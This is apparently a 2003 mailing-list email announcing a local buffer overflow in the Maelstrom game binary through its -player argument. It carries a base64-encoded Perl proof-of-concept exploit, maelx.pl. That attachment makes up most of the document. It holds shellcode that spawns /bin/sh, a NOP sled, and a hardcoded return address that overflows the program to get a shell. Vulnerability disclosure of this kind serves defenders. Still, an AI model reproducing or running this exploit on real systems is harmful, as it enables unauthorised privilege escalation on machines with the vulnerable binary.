------------=_1053443743-18551-1
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit

Local exploit for /usr/bin/Maelstrom due to insufficient bounds checking of the -player cmd line arg.

See attached proof-of-concept exploit.


-akcess
-- 
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr

Powered by Outblaze

------------=_1053443743-18551-1
Content-Type: application/octet-stream; name="maelx.pl"
Content-Disposition: attachment; filename="maelx.pl"
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9wZXJsIC13DQojDQojIC91c3IvYmluL01hZWxzdHJvbSAt
cGxheWVyIExvY2FsIEJ1ZmZlciBPdmVyZmxvdyBFeHBsb2l0IGJ5IGFrY2Vz
cw0KIw0KIyBUaGlzIGNvZGUgZXhwbG9pdHMgdGhlIC1wbGF5ZXIgb3ZlcmZs
b3cgd2hpY2ggaSBkaXNjb3ZlcmVkIGFmdGVyDQojIHJlYWRpbmcgdGhlIGlu
aXRpYWwgYWR2aXNvcnkgZGV0YWlsaW5nICB0aGUgLXNlcnZlciAgb3ZlcmZs
b3cgYnkNCiMgTHVjYSBFcmNvbGkNCiMNCiMgWyBha2Nlc3NAbGludXhtYWls
Lm9yZyBdIC0gKjIxLzA1LzAzKg0KDQoNCiRzYyA9ICJceDkwIngxNTAwOyAj
IHdyaXRlIHN0ZG91dCAiYWtjZXNzIHd1eiBoZXJlLi4uIjsgZXhlY3ZlIC9i
aW4vc2g7IGV4aXQ7DQokc2MgLj0gIlx4MzFceGMwXHgzMVx4ZGJceDMxXHhk
Mlx4NTNceDY4XHgyZVx4MmVceDIwXHgwYVx4NjhceDY1XHg3Mlx4NjUiOw0K
JHNjIC49ICJceDJlXHg2OFx4NzVceDdhXHgyMFx4NjhceDY4XHg3M1x4NzNc
eDIwXHg3N1x4NjhceDYxXHg2Ylx4NjNceDY1IjsNCiRzYyAuPSAiXHg4OVx4
ZTFceGIyXHgxOFx4YjBceDA0XHhjZFx4ODBceDMxXHhjMFx4NTBceDY4XHg2
ZVx4MmZceDczXHg2OCI7DQokc2MgLj0gIlx4NjhceDJmXHgyZlx4NjJceDY5
XHg4OVx4ZTNceDhkXHg1NFx4MjRceDA4XHg1MFx4NTNceDhkXHgwY1x4MjQi
Ow0KJHNjIC49ICJceGIwXHgwYlx4Y2RceDgwIjsNCg0KJEVOVnsnU0MnfSA9
ICRzYzsNCg0KJG9mZnNldCA9ICIwIjsNCiRyZXQgPSAweGJmZmZmOWVlOw0K
DQoNCmZvciAoJGkgPSAwOyAkaSA8ICg4MTc3IC0gNCk7ICRpKyspIHsNCiAg
ICAkYnVmIC49ICJceDkwIjsNCn0NCg0KDQokYnVmIC49IHBhY2soJ2wnLCAo
JHJldCArICRvZmZzZXQpKTsNCg0KcHJpbnQoIlVzaW5nIHJldHVybiBhZGRy
ZXNzOiAweCIsIHNwcmludGYoJyVseCcsKCRyZXQgKyAkb2Zmc2V0KSksIlxu
Iik7DQpleGVjKCIvdXNyL2Jpbi9NYWVsc3Ryb20gLXBsYXllciAxXEAnJGJ1
ZiciKTs=

------------=_1053443743-18551-1--